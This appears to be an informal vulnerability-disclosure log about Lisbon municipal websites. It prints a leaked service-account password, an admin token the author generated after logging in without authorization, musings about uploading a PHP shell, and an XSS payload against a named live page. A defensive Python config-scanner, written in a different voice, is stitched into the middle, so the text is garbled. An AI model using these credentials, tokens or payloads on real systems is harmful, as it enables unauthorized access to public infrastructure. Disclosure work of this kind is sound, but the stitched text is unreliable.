15/3/2019 - First warning email sent to helpdesk@cm-lisboa.pt and infosite@cm-lisboa.pt

15/3/2019 - Made a phone call and talked to José Fernandes

15/3/2019 - Reported to suporte.web@cm-lisboa.pt, josé.fernandes@cm-lisboa.pt, jose.fernandes@cm-lisboa.pt

Not sure if the correct email had an accent in the "e" or not, so I sent to both xD

.

In the page:

http://lxi.cm-lisboa.pt/lxi/config/Backup_04_08_2016/config.freguesia.xml

.

If you check the source code, there is a line with:

<ArcGISSecurity url="https://digc.cm-lisboa.pt/DIGC/tokens" username="app_wsgeo" password="R3A4OTYhaHM=" expiration="1440" />
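The problem behind that line is twofold: a backup directory was reachable under the web root, and the config inside it carried a service account password that is only base64-encoded, not encrypted. Below is an added example of the check a site owner could run over their own web roots to catch both conditions. It is not code from the report above; the config it scans is a constructed sample with an invented hostname, account name and password, and the attribute-name list is an assumption about what typically holds credentials.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Attribute names that usually carry credentials in web/GIS config files.
# Constructed list for this example; extend it for your own stack.
SECRET_ATTRS = re.compile(r"(password|passwd|pwd|secret|token|apikey)", re.IGNORECASE)

# Path fragments that suggest a backup copy sitting where the web server can serve it.
BACKUP_PATH = re.compile(r"(backup|\.bak$|\.old$|~$)", re.IGNORECASE)


def is_backup_like_path(path: str) -> bool:
    """True if the path looks like a backup artefact (e.g. .../config/Backup_.../x.xml)."""
    return bool(BACKUP_PATH.search(path))


def looks_like_base64_text(value: str):
    """Return the decoded string if `value` is base64 that decodes to printable
    ASCII (i.e. the secret is merely obfuscated, not encrypted); else None."""
    if len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded and decoded.isprintable() else None


def find_embedded_credentials(xml_text: str):
    """Parse an XML config and return (tag, attribute, kind) for every attribute
    whose name suggests a credential. kind is 'base64' when the value is only
    base64-encoded text, 'plaintext' otherwise. Either way it is a finding."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if not SECRET_ATTRS.search(attr) or not value:
                continue
            kind = "base64" if looks_like_base64_text(value) else "plaintext"
            findings.append((elem.tag, attr, kind))
    return findings


# Constructed sample config, modelled on the shape of an ArcGIS security block.
# The host, account and password are all invented for this example.
FAKE_PASSWORD_B64 = base64.b64encode(b"not-a-real-secret").decode()
SAMPLE_CONFIG = f"""<configuration>
  <MapService url="https://gis.example.invalid/arcgis/rest" />
  <ArcGISSecurity url="https://gis.example.invalid/tokens"
                  username="svc_example" password="{FAKE_PASSWORD_B64}" expiration="1440" />
  <Smtp host="mail.example.invalid" passwd="hunter2" />
</configuration>"""

if __name__ == "__main__":
    sample_path = "/lxi/config/Backup_04_08_2016/config.freguesia.xml"
    if is_backup_like_path(sample_path):
        print(f"{sample_path}: backup artefact under web root")
    for tag, attr, kind in find_embedded_credentials(SAMPLE_CONFIG):
        print(f"{tag}.{attr}: {kind} credential embedded in config")
```

Run it against every *.xml / *.config under the document root of each site; any hit on a backup-like path or any credential attribute, base64 or not, means the secret has to be rotated and the file moved out of the served tree.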

.

.

Login page took a second to find:

https://gis.cm-lisboa.pt/arcgis/rest/login

.

Tried, and guess what? Successfully logged in as the admin.

I didn't understand what it was exactly, but I got to create an administration token that granted me admin privileges on the files without having to log in every single time. Should have invested more time in it before reporting it, maybe try to get RCE via PHP shell upload or something.

.

https://gis.cm-lisboa.pt/arcgis/tokens/generateToken

.

Token:

Uu1dMq6OiDiXV-YYiSmHOHfE1lmjtv7M8JFEFt2l0oBHBDbR59PwM3C4QZwnpOiM

.

Oh, and the XSS:

http://atendimentovirtual.cm-lisboa.pt/CMLMensagem.aspx?msg=<Image SrcSet=K */; OnError=confirm'1'//>